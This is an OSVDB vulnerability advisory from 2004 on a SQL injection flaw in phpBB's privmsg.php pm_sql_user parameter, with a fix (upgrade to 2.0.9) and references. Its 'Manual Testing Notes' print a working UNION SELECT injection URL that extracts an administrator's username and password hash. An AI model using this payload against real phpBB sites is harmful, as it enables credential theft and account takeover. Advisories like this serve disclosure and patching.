phpBB privmsg.php pm_sql_user Variable SQL Injection

2004-03-26T00:00:00
ID OSVDB:7809
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-03-26T00:00:00

Description

Vulnerability Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the $pm_sql_user variable in the privmsg.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 2.0.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. A patch was 2.0.8a was released, but there are multiple other errors that were fixed in 2.0.9.

Short Description

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the $pm_sql_user variable in the privmsg.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=- 99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*

References:

Vendor URL: http://www.phpbb.com/ Vendor Specific Advisory URL Vendor Specific Advisory URL Secunia Advisory ID:12055 Related OSVDB ID: 7810 Related OSVDB ID: 7811 Related OSVDB ID: 7812 Related OSVDB ID: 7813 Related OSVDB ID: 7815 Related OSVDB ID: 7808 Related OSVDB ID: 7814 Mail List Post: http://packetstormsecurity.nl/0403-advisories/phpBB207a.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0264.html ISS X-Force ID: 15578 Bugtraq ID: 9896